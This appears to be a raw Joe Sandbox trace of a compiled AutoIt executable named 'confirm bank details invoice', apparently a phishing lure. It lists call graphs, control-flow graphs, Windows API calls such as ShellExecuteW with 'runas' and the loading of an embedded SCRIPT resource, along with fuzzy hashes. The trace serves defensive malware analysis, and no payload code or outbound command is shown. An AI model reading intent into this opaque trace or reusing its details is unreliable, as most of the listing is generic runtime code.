GetStdHandle 95404->95407 95405 496986 __calloc_crt 47 API calls 95405->95410 95406 49aedb GetFileType 95406->95407 95407->95402 95407->95404 95407->95406 95409 49af08 InitializeCriticalSectionAndSpinCount 95407->95409 95408 49ada5 95408->95407 95411 49ade5 InitializeCriticalSectionAndSpinCount 95408->95411 95412 49add7 GetFileType 95408->95412 95409->95407 95410->95405 95410->95407 95410->95408 95411->95408 95412->95408 95412->95411 95414 4a2e8e 95413->95414 95415 495ead 95413->95415 95487 4969d0 47 API calls __crtLCMapStringA_stat 95414->95487 95420 4a2a7b GetModuleFileNameW 95415->95420 95418 4a2eb4 _memcpy_s 95419 4a2eca FreeEnvironmentStringsW 95418->95419 95419->95415 95421 4a2aaf _wparse_cmdline 95420->95421 95422 495eb7 95421->95422 95423 4a2ae9 95421->95423 95422->95354 95460 49115b 47 API calls 3 library calls 95422->95460 95488 4969d0 47 API calls __crtLCMapStringA_stat 95423->95488 95425 4a2aef _wparse_cmdline 95425->95422 95427 4a2ccd __NMSG_WRITE 95426->95427 95428 4a2cc5 95426->95428 95429 496986 __calloc_crt 47 API calls 95427->95429 95428->95357 95433 4a2cf6 __NMSG_WRITE 95429->95433 95430 4a2d4d 95431 491c9d _free 47 API calls 95430->95431 95431->95428 95432 496986 __calloc_crt 47 API calls 95432->95433 95433->95428 95433->95430 95433->95432 95434 4a2d72 95433->95434 95437 4a2d89 95433->95437 95489 4a2567 47 API calls __wtof_l 95433->95489 95435 491c9d _free 47 API calls 95434->95435 95435->95428 95490 496e20 IsProcessorFeaturePresent 95437->95490 95439 4a2d95 95439->95357 95441 4911a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95440->95441 95443 4911e0 __IsNonwritableInCurrentImage 95441->95443 95505 490f0a 52 API calls __cinit 95441->95505 95443->95361 95445 4e1ebf 95444->95445 95446 473a29 95444->95446 95447 473a63 IsThemeActive 95446->95447 95506 491405 95447->95506 95451 473a8f 95518 473adb SystemParametersInfoW SystemParametersInfoW 95451->95518 95453 473a9b 95519 473d19 95453->95519 95457->95339 95458->95343 
95459->95350 95465->95375 95466->95377 95467->95381 95468->95382 95472 49698d 95469->95472 95471 4969ca 95471->95386 95475 497ec9 TlsSetValue 95471->95475 95472->95471 95473 4969ab Sleep 95472->95473 95478 4a30aa 95472->95478 95474 4969c2 95473->95474 95474->95471 95474->95472 95475->95390 95476->95393 95477->95389 95479 4a30b5 95478->95479 95483 4a30d0 __calloc_impl 95478->95483 95480 4a30c1 95479->95480 95479->95483 95485 497c0e 47 API calls __getptd_noexit 95480->95485 95481 4a30e0 RtlAllocateHeap 95481->95483 95484 4a30c6 95481->95484 95483->95481 95483->95484 95484->95472 95485->95484 95486->95401 95487->95418 95488->95425 95489->95433 95491 496e2b 95490->95491 95496 496cb5 95491->95496 95495 496e46 95495->95439 95497 496ccf _memset ___raise_securityfailure 95496->95497 95498 496cef IsDebuggerPresent 95497->95498 95504 4981ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95498->95504 95500 49a70c __wtof_l 6 API calls 95502 496dd6 95500->95502 95501 496db3 ___raise_securityfailure 95501->95500 95503 498197 GetCurrentProcess TerminateProcess 95502->95503 95503->95495 95504->95501 95505->95443 95507 497cf4 __lock 47 API calls 95506->95507 95508 491410 95507->95508 95571 497e58 LeaveCriticalSection 95508->95571 95510 473a88 95511 49146d 95510->95511 95512 491491 95511->95512 95513 491477 95511->95513 95512->95451 95513->95512 95572 497c0e 47 API calls __getptd_noexit 95513->95572 95515 491481 95573 496e10 8 API calls __wtof_l 95515->95573 95517 49148c 95517->95451 95518->95453 95520 473d26 __ftell_nolock 95519->95520 95521 47d7f7 48 API calls 95520->95521 95522 473d31 GetCurrentDirectoryW 95521->95522 95574 4761ca 95522->95574 95571->95510 95572->95515 95573->95517 95691 48e99b 95574->95691 95578 4761eb 95579 475374 50 API calls 95578->95579 95580 4761ff 95579->95580 95581 47ce19 48 API calls 95580->95581 95582 47620c 95581->95582 95708 4739db 95582->95708 95584 476216 Mailbox 95585 476eed 48 API calls 95584->95585 95586 47622b 95585->95586 95720 479048 
95586->95720 95589 47ce19 48 API calls 95590 476244 95589->95590 95591 47d6e9 55 API calls 95590->95591 95592 476254 Mailbox 95591->95592 95593 47ce19 48 API calls 95592->95593 95594 47627c 95593->95594 95595 47d6e9 55 API calls 95594->95595 95596 47628f Mailbox 95595->95596 95597 47ce19 48 API calls 95596->95597 95598 4762a0 95597->95598 95599 47d645 53 API calls 95598->95599 95600 4762b2 Mailbox 95599->95600 95601 47d7f7 48 API calls 95600->95601 95602 4762c5 95601->95602 95723 4763fc 95602->95723 95606 4762df 95607 4e1c08 95606->95607 95608 4762e9 95606->95608 95609 4763fc 48 API calls 95607->95609 95610 490fa7 _W_store_winword 59 API calls 95608->95610 95611 4e1c1c 95609->95611 95612 4762f4 95610->95612 95615 4763fc 48 API calls 95611->95615 95612->95611 95613 4762fe 95612->95613 95614 490fa7 _W_store_winword 59 API calls 95613->95614 95616 476309 95614->95616 95617 4e1c38 95615->95617 95616->95617 95618 476313 95616->95618 95620 475374 50 API calls 95617->95620 95619 490fa7 _W_store_winword 59 API calls 95618->95619 95621 47631e 95619->95621 95622 4e1c5d 95620->95622 95624 47635f 95621->95624 95626 4e1c86 95621->95626 95629 4763fc 48 API calls 95621->95629 95623 4763fc 48 API calls 95622->95623 95625 4e1c69 95623->95625 95624->95626 95627 47636c 95624->95627 95628 476eed 48 API calls 95625->95628 95630 476eed 48 API calls 95626->95630 95631 48c050 48 API calls 95627->95631 95632 4e1c77 95628->95632 95633 476342 95629->95633 95634 4e1ca8 95630->95634 95635 476384 95631->95635 95636 4763fc 48 API calls 95632->95636 95637 476eed 48 API calls 95633->95637 95638 4763fc 48 API calls 95634->95638 95639 481b90 48 API calls 95635->95639 95636->95626 95640 476350 95637->95640 95641 4e1cb5 95638->95641 95645 476394 95639->95645 95642 4763fc 48 API calls 95640->95642 95641->95641 95642->95624 95692 47d7f7 48 API calls 95691->95692 95693 4761db 95692->95693 95694 476009 95693->95694 95695 476016 __ftell_nolock 95694->95695 95696 476a63 48 API calls 95695->95696 95701 
47617c Mailbox 95695->95701 95698 476048 95696->95698 95706 47607e Mailbox 95698->95706 95740 4761a6 95698->95740 95699 47614f 95700 47ce19 48 API calls 95699->95700 95699->95701 95703 476170 95700->95703 95701->95578 95702 47ce19 48 API calls 95702->95706 95704 4764cf 48 API calls 95703->95704 95704->95701 95705 4764cf 48 API calls 95705->95706 95706->95699 95706->95701 95706->95702 95706->95705 95707 4761a6 48 API calls 95706->95707 95707->95706 95709 4741a9 136 API calls 95708->95709 95710 4739fe 95709->95710 95711 473a06 95710->95711 95743 4bc396 95710->95743 95711->95584 95714 4e2ff0 95716 491c9d _free 47 API calls 95714->95716 95715 474252 84 API calls 95715->95714 95717 4e2ffd 95716->95717 95718 474252 84 API calls 95717->95718 95719 4e3006 95718->95719 95719->95719 95721 48f4ea 48 API calls 95720->95721 95722 476237 95721->95722 95722->95589 95724 476406 95723->95724 95725 47641f 95723->95725 95726 476eed 48 API calls 95724->95726 95727 476a63 48 API calls 95725->95727 95728 4762d1 95726->95728 95727->95728 95729 490fa7 95728->95729 95730 491028 95729->95730 95731 490fb3 95729->95731 95780 49103a 59 API calls 3 library calls 95730->95780 95735 490fd8 95731->95735 95778 497c0e 47 API calls __getptd_noexit 95731->95778 95734 491035 95734->95606 95735->95606 95736 490fbf 95779 496e10 8 API calls __wtof_l 95736->95779 95738 490fca 95738->95606 95741 47bdfa 48 API calls 95740->95741 95742 4761b1 95741->95742 95742->95698 95744 474517 83 API calls 95743->95744 95745 4bc405 95744->95745 95746 4bc56d 94 API calls 95745->95746 95747 4bc417 95746->95747 95748 4744ed 64 API calls 95747->95748 95777 4bc41b 95747->95777 95749 4bc432 95748->95749 95750 4744ed 64 API calls 95749->95750 95751 4bc442 95750->95751 95752 4744ed 64 API calls 95751->95752 95753 4bc45d 95752->95753 95754 4744ed 64 API calls 95753->95754 95755 4bc478 95754->95755 95756 474517 83 API calls 95755->95756 95757 4bc48f 95756->95757 95758 49395c __crtLCMapStringA_stat 47 API calls 95757->95758 95759 
4bc496 95758->95759 95760 49395c __crtLCMapStringA_stat 47 API calls 95759->95760 95761 4bc4a0 95760->95761 95762 4744ed 64 API calls 95761->95762 95763 4bc4b4 95762->95763 95764 4bbf5a GetSystemTimeAsFileTime 95763->95764 95765 4bc4c7 95764->95765 95766 4bc4dc 95765->95766 95767 4bc4f1 95765->95767 95768 491c9d _free 47 API calls 95766->95768 95769 4bc4f7 95767->95769 95770 4bc556 95767->95770 95772 4bc4e2 95768->95772 95773 4bb965 118 API calls 95769->95773 95771 491c9d _free 47 API calls 95770->95771 95771->95777 95775 491c9d _free 47 API calls 95772->95775 95774 4bc54e 95773->95774 95776 491c9d _free 47 API calls 95774->95776 95775->95777 95776->95777 95777->95714 95777->95715 95778->95736 95779->95738 95780->95734 95991 4e19ba 95996 48c75a 95991->95996 95995 4e19c9 95997 47d7f7 48 API calls 95996->95997 95998 48c7c8 95997->95998 96004 48d26c 95998->96004 96001 48c865 96002 48c881 96001->96002 96007 48d1fa 48 API calls _memcpy_s 96001->96007 96003 490f0a 52 API calls __cinit 96002->96003 96003->95995 96008 48d298 96004->96008 96007->96001 96009 48d28b 96008->96009 96010 48d2a5 96008->96010 96009->96001 96010->96009 96011 48d2ac RegOpenKeyExW 96010->96011 96011->96009 96012 48d2c6 RegQueryValueExW 96011->96012 96013 48d2fc RegCloseKey 96012->96013 96014 48d2e7 96012->96014 96013->96009 96014->96013 96015 4e197b 96020 48dd94 96015->96020 96019 4e198a 96021 48f4ea 48 API calls 96020->96021 96022 48dd9c 96021->96022 96023 48ddb0 96022->96023 96028 48df3d 96022->96028 96027 490f0a 52 API calls __cinit 96023->96027 96027->96019 96029 48dda8 96028->96029 96030 48df46 96028->96030 96032 48ddc0 96029->96032 96060 490f0a 52 API calls __cinit 96030->96060 96033 47d7f7 48 API calls 96032->96033 96034 48ddd7 GetVersionExW 96033->96034 96035 476a63 48 API calls 96034->96035 96036 48de1a 96035->96036 96061 48dfb4 96036->96061 96039 476571 48 API calls 96043 48de2e 96039->96043 96040 4e24c8 96043->96040 96065 48df77 96043->96065 96044 48dea4 GetCurrentProcess 96074 48df5f 
LoadLibraryA GetProcAddress 96044->96074 96045 48debb 96046 48df31 GetSystemInfo 96045->96046 96047 48dee3 96045->96047 96050 48df0e 96046->96050 96068 48e00c 96047->96068 96052 48df1c FreeLibrary 96050->96052 96053 48df21 96050->96053 96052->96053 96053->96023 96054 48df29 GetSystemInfo 96057 48df03 96054->96057 96055 48def9 96071 48dff4 96055->96071 96057->96050 96059 48df09 FreeLibrary 96057->96059 96059->96050 96060->96029 96062 48dfbd 96061->96062 96063 47b18b 48 API calls 96062->96063 96064 48de22 96063->96064 96064->96039 96075 48df89 96065->96075 96079 48e01e 96068->96079 96072 48e00c 2 API calls 96071->96072 96073 48df01 GetNativeSystemInfo 96072->96073 96073->96057 96074->96045 96076 48dea0 96075->96076 96077 48df92 LoadLibraryA 96075->96077 96076->96044 96076->96045 96077->96076 96078 48dfa3 GetProcAddress 96077->96078 96078->96076 96080 48def1 96079->96080 96081 48e027 LoadLibraryA 96079->96081 96080->96054 96080->96055 96081->96080 96082 48e038 GetProcAddress 96081->96082 96082->96080 96083 4e8eb8 96087 4ba635 96083->96087 96085 4e8ec3 96086 4ba635 84 API calls 96085->96086 96086->96085 96092 4ba642 96087->96092 96097 4ba66f 96087->96097 96088 4ba671 96099 48ec4e 81 API calls 96088->96099 96090 4ba676 96091 47936c 81 API calls 96090->96091 96093 4ba67d 96091->96093 96092->96088 96092->96090 96095 4ba669 96092->96095 96092->96097 96094 47510d 48 API calls 96093->96094 96094->96097 96098 484525 61 API calls _memcpy_s 96095->96098 96097->96085 96098->96097 96099->96090 96100 47b7b1 96109 47c62c 96100->96109 96102 47b7ec 96104 47ba85 48 API calls 96102->96104 96103 47b7c2 96103->96102 96117 47bc74 48 API calls 96103->96117 96108 47b6b7 Mailbox 96104->96108 96106 47b7e0 96107 47ba85 48 API calls 96106->96107 96107->96102 96110 47bcce 48 API calls 96109->96110 96115 47c63b 96110->96115 96111 4e39fd 96118 4b26bc 88 API calls 4 library calls 96111->96118 96113 4e3a0b 96114 47c799 48 API calls 96114->96115 96115->96111 96115->96114 96116 47c68b 96115->96116 
96116->96103 96117->96106 96118->96113 96119 47f030 96120 483b70 335 API calls 96119->96120 96121 47f03c 96120->96121

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 644 49b043-49b080 call 49f8a0 647 49b089-49b08b 644->647 648 49b082-49b084 644->648 650 49b08d-49b0a7 call 497bda call 497c0e call 496e10 647->650 651 49b0ac-49b0d9 647->651 649 49b860-49b86c call 49a70c 648->649 650->649 652 49b0db-49b0de 651->652 653 49b0e0-49b0e7 651->653 652->653 656 49b10b-49b110 652->656 657 49b0e9-49b100 call 497bda call 497c0e call 496e10 653->657 658 49b105 653->658 662 49b11f-49b12d call 4a3bf2 656->662 663 49b112-49b11c call 49f82f 656->663 693 49b851-49b854 657->693 658->656 674 49b44b-49b45d 662->674 675 49b133-49b145 662->675 663->662 678 49b7b8-49b7d5 WriteFile 674->678 679 49b463-49b473 674->679 675->674 677 49b14b-49b183 call 497a0d GetConsoleMode 675->677 677->674 697 49b189-49b18f 677->697 685 49b7e1-49b7e7 GetLastError 678->685 686 49b7d7-49b7df 678->686 682 49b479-49b484 679->682 683 49b55a-49b55f 679->683 691 49b81b-49b833 682->691 692 49b48a-49b49a 682->692 688 49b663-49b66e 683->688 689 49b565-49b56e 683->689 687 49b7e9 685->687 686->687 694 49b7ef-49b7f1 687->694 688->691 701 49b674 688->701 689->691 695 49b574 689->695 699 49b83e-49b84e call 497c0e call 497bda 691->699 700 49b835-49b838 691->700 698 49b4a0-49b4a3 692->698 696 49b85e-49b85f 693->696 703 49b7f3-49b7f5 694->703 704 49b856-49b85c 694->704 705 49b57e-49b595 695->705 696->649 706 49b199-49b1bc GetConsoleCP 697->706 707 49b191-49b193 697->707 708 49b4e9-49b520 WriteFile 698->708 709 49b4a5-49b4be 698->709 699->693 700->699 710 49b83a-49b83c 700->710 711 49b67e-49b693 701->711 703->691 714 49b7f7-49b7fc 703->714 704->696 715 49b59b-49b59e 705->715 716 49b440-49b446 706->716 717 49b1c2-49b1ca 706->717 707->674 707->706 708->685 720 49b526-49b538 708->720 718 49b4cb-49b4e7 709->718 719 49b4c0-49b4ca 709->719 710->696 712 49b699-49b69b 711->712 721 49b6d8-49b719 WideCharToMultiByte 712->721 722 49b69d-49b6b3 712->722 724 49b7fe-49b810 call 497c0e call 497bda 714->724 725 49b812-49b819 call 497bed 714->725 726 49b5de-49b627 
WriteFile 715->726 727 49b5a0-49b5b6 715->727 716->703 728 49b1d4-49b1d6 717->728 718->698 718->708 719->718 720->694 729 49b53e-49b54f 720->729 721->685 734 49b71f-49b721 721->734 731 49b6b5-49b6c4 722->731 732 49b6c7-49b6d6 722->732 724->693 725->693 726->685 739 49b62d-49b645 726->739 736 49b5b8-49b5ca 727->736 737 49b5cd-49b5dc 727->737 740 49b36b-49b36e 728->740 741 49b1dc-49b1fe 728->741 729->692 730 49b555 729->730 730->694 731->732 732->712 732->721 744 49b727-49b75a WriteFile 734->744 736->737 737->715 737->726 739->694 747 49b64b-49b658 739->747 742 49b370-49b373 740->742 743 49b375-49b3a2 740->743 748 49b200-49b215 741->748 749 49b217-49b223 call 491688 741->749 742->743 750 49b3a8-49b3ab 742->750 743->750 751 49b77a-49b78e GetLastError 744->751 752 49b75c-49b776 744->752 747->705 754 49b65e 747->754 755 49b271-49b283 call 4a40f7 748->755 764 49b269-49b26b 749->764 765 49b225-49b239 749->765 758 49b3ad-49b3b0 750->758 759 49b3b2-49b3c5 call 4a5884 750->759 763 49b794-49b796 751->763 752->744 760 49b778 752->760 754->694 774 49b289 755->774 775 49b435-49b43b 755->775 758->759 766 49b407-49b40a 758->766 759->685 778 49b3cb-49b3d5 759->778 760->763 763->687 769 49b798-49b7b0 763->769 764->755 771 49b23f-49b254 call 4a40f7 765->771 772 49b412-49b42d 765->772 766->728 770 49b410 766->770 769->711 776 49b7b6 769->776 770->775 771->775 784 49b25a-49b267 771->784 772->775 779 49b28f-49b2c4 WideCharToMultiByte 774->779 775->687 776->694 781 49b3fb-49b401 778->781 782 49b3d7-49b3ee call 4a5884 778->782 779->775 783 49b2ca-49b2f0 WriteFile 779->783 781->766 782->685 789 49b3f4-49b3f5 782->789 783->685 786 49b2f6-49b30e 783->786 784->779 786->775 788 49b314-49b31b 786->788 788->781 790 49b321-49b34c WriteFile 788->790 789->781 790->685 791 49b352-49b359 790->791 791->775 792 49b35f-49b366 791->792 792->781
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9aa2946a0a02e17f8ab3ebfeb4dc56589465331e33c4191759225acf552b8a9f
                    • Instruction ID: 49bdfc38999b0cc67401450b741ab0b7962de563bac3c4d06c5d6264cb6cf1a5
                    • Opcode Fuzzy Hash: 9aa2946a0a02e17f8ab3ebfeb4dc56589465331e33c4191759225acf552b8a9f
                    • Instruction Fuzzy Hash: F2326075A022188FCF24CF54ED456EABBB5FF46314F0441EAE40AA7A91D7349D80CF96

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00473AA3,?), ref: 00473D45
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00473AA3,?), ref: 00473D57
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00531148,00531130,?,?,?,?,00473AA3,?), ref: 00473DC8
                      • Part of subcall function 00476430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00473DEE,00531148,?,?,?,?,?,00473AA3,?), ref: 00476471
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00473AA3,?), ref: 00473E48
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,005228F4,00000010), ref: 004E1CCE
                    • SetCurrentDirectoryW.KERNEL32(?,00531148,?,?,?,?,?,00473AA3,?), ref: 004E1D06
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0050DAB4,00531148,?,?,?,?,?,00473AA3,?), ref: 004E1D89
                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00473AA3), ref: 004E1D90
                      • Part of subcall function 00473E6E: GetSysColorBrush.USER32(0000000F), ref: 00473E79
                      • Part of subcall function 00473E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00473E88
                      • Part of subcall function 00473E6E: LoadIconW.USER32(00000063), ref: 00473E9E
                      • Part of subcall function 00473E6E: LoadIconW.USER32(000000A4), ref: 00473EB0
                      • Part of subcall function 00473E6E: LoadIconW.USER32(000000A2), ref: 00473EC2
                      • Part of subcall function 00473E6E: RegisterClassExW.USER32(?), ref: 00473F30
                      • Part of subcall function 004736B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004736E6
                      • Part of subcall function 004736B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00473707
                      • Part of subcall function 004736B8: ShowWindow.USER32(00000000,?,?,?,?,00473AA3,?), ref: 0047371B
                      • Part of subcall function 004736B8: ShowWindow.USER32(00000000,?,?,?,?,00473AA3,?), ref: 00473724
                      • Part of subcall function 00474FFC: _memset.LIBCMT ref: 00475022
                      • Part of subcall function 00474FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004750CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                    • String ID: ()R$This is a third-party compiled AutoIt script.$runas
                    • API String ID: 438480954-2871243473
                    • Opcode ID: ca7ec14b365b40744be1d7433bb95ec6f4e84a73207aa19e206732c1c7fddcf2
                    • Instruction ID: e3f2763818cab12f8c45c454d979a1251262c7bb1ddec82003831778c47252ce
                    • Opcode Fuzzy Hash: ca7ec14b365b40744be1d7433bb95ec6f4e84a73207aa19e206732c1c7fddcf2
                    • Instruction Fuzzy Hash: A8514830E04644AACB01AFF1DC45DEE7B75AF19705F00C06BF505662A2DB785649EB2E

                    Control-flow Graph

                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 0048DDEC
                    • GetCurrentProcess.KERNEL32(00000000,0050DC38,?,?), ref: 0048DEAC
                    • GetNativeSystemInfo.KERNELBASE(?,0050DC38,?,?), ref: 0048DF01
                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0048DF0C
                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0048DF1F
                    • GetSystemInfo.KERNEL32(?,0050DC38,?,?), ref: 0048DF29
                    • GetSystemInfo.KERNEL32(?,0050DC38,?,?), ref: 0048DF35
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                    • String ID:
                    • API String ID: 3851250370-0
                    • Opcode ID: 11f72345c335e393f6c72ca16af147353ec5712322cddd6496d4b64f1c8e83f3
                    • Instruction ID: 2718635847419978543286695ad90cfa835d3ca938418460c75b6197a899c9d4
                    • Opcode Fuzzy Hash: 11f72345c335e393f6c72ca16af147353ec5712322cddd6496d4b64f1c8e83f3
                    • Instruction Fuzzy Hash: 9461B571C0A2C4DBCF16DF6994C11EE7FB46F29300B1949DAD8455F38BC668C909CB6A

                    Control-flow Graph

                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0047449E,?,?,00000000,00000001), ref: 0047407B
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0047449E,?,?,00000000,00000001), ref: 00474092
                    • LoadResource.KERNEL32(?,00000000,?,?,0047449E,?,?,00000000,00000001,?,?,?,?,?,?,004741FB), ref: 004E4F1A
                    • SizeofResource.KERNEL32(?,00000000,?,?,0047449E,?,?,00000000,00000001,?,?,?,?,?,?,004741FB), ref: 004E4F2F
                    • LockResource.KERNEL32(0047449E,?,?,0047449E,?,?,00000000,00000001,?,?,?,?,?,?,004741FB,00000000), ref: 004E4F42
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT
                    • API String ID: 3051347437-3967369404
                    • Opcode ID: ea8f1ee652ff0207892fb31fe83e04414f3e3539e8ddffdf4bacdc5467f08577
                    • Instruction ID: 30da49bf6aa5151e6a5f929789bcb0317d8301df5d2b2fe741f5043c1969d284
                    • Opcode Fuzzy Hash: ea8f1ee652ff0207892fb31fe83e04414f3e3539e8ddffdf4bacdc5467f08577
                    • Instruction Fuzzy Hash: 5B115770600741AFE7318B26EC48F777BBAEBC5B51F20856DF606962A0DB71DC00CA64
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Exception@8Throwstd::exception::exception
                    • String ID: @$ S$ S$ S
                    • API String ID: 3728558374-2981100487
                    • Opcode ID: 2de07450898827caea80e73bf76c32ec3b198f78fb652bf73522e69392567e88
                    • Instruction ID: f2f760a98f977ebcabc497526d8a24ade7cc07efd31781b197d6d1d1acf67ff0
                    • Opcode Fuzzy Hash: 2de07450898827caea80e73bf76c32ec3b198f78fb652bf73522e69392567e88
                    • Instruction Fuzzy Hash: 3972DF30D042099FCF14EF95C481ABEB7B5EF48714F14845BE909AB351D738AE46CB99
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,004E2F49), ref: 004B6CB9
                    • FindFirstFileW.KERNELBASE(?,?), ref: 004B6CCA
                    • FindClose.KERNEL32(00000000), ref: 004B6CDA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 6a09b146a199b9c7f00ca4c19b0895aab71eac964b42d674610c9baf3d45bab1
                    • Instruction ID: cd2b4ffdfb66a5ea08e7805cc68f1fc296df5deb1a0fba2f46ed6a694af96fbe
                    • Opcode Fuzzy Hash: 6a09b146a199b9c7f00ca4c19b0895aab71eac964b42d674610c9baf3d45bab1
                    • Instruction Fuzzy Hash: C1E0D831C104105782146738ED0D4FA3B7DDA05339F100B16F571C12D0EB78E91095EE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: S
                    • API String ID: 3964851224-2211950704
